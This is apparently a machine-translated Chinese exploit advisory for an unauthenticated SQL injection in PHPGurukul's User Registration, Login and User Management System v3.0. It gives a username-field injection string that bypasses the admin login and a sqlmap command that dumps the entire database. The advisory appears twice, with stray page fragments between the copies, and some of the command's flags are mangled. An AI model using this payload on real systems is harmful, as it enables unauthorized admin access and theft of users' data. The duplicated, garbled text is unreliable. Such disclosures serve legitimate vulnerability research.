#利用标题:用户注册登录和用户管理系统v3.0 -SQL注入(未经身份验证)
#Google Dork: NA
#日期: 19/08/2023
#利用作者: Ashutosh Singh Umath
#供应商homepage: https://phpgurukul.com
#软件link:
#版本: 3.0
#测试在: Windows 11
#CVE :请求
概念证明:
1。导航到管理登录页面。
URL: http://192.168.1.5/loginsystem/admin/
2。在“管理用户名”字段中输入'*admin' - *'
在密码字段中随机。
3。现在您成功登录为管理员。
4。要从数据库下载所有数据,请使用以下命令。
4.1。登录到管理员门户并捕获请求。
4.2。复制文件中的截取请求。
4.3。现在使用以下命令转储所有数据
command: sqlmap -r file -name -p用户名-D loginSystem -dump -all
谢谢,问候,
Ashutosh Singh Umath
#Google Dork: NA
#日期: 19/08/2023
#利用作者: Ashutosh Singh Umath
#供应商homepage: https://phpgurukul.com
#软件link:
正在加载...
phpgurukul.com
#测试在: Windows 11
#CVE :请求
概念证明:
1。导航到管理登录页面。
URL: http://192.168.1.5/loginsystem/admin/
2。在“管理用户名”字段中输入'*admin' - *'
在密码字段中随机。
3。现在您成功登录为管理员。
4。要从数据库下载所有数据,请使用以下命令。
4.1。登录到管理员门户并捕获请求。
4.2。复制文件中的截取请求。
4.3。现在使用以下命令转储所有数据
command: sqlmap -r file -name -p用户名-D loginSystem -dump -all
谢谢,问候,
Ashutosh Singh Umath
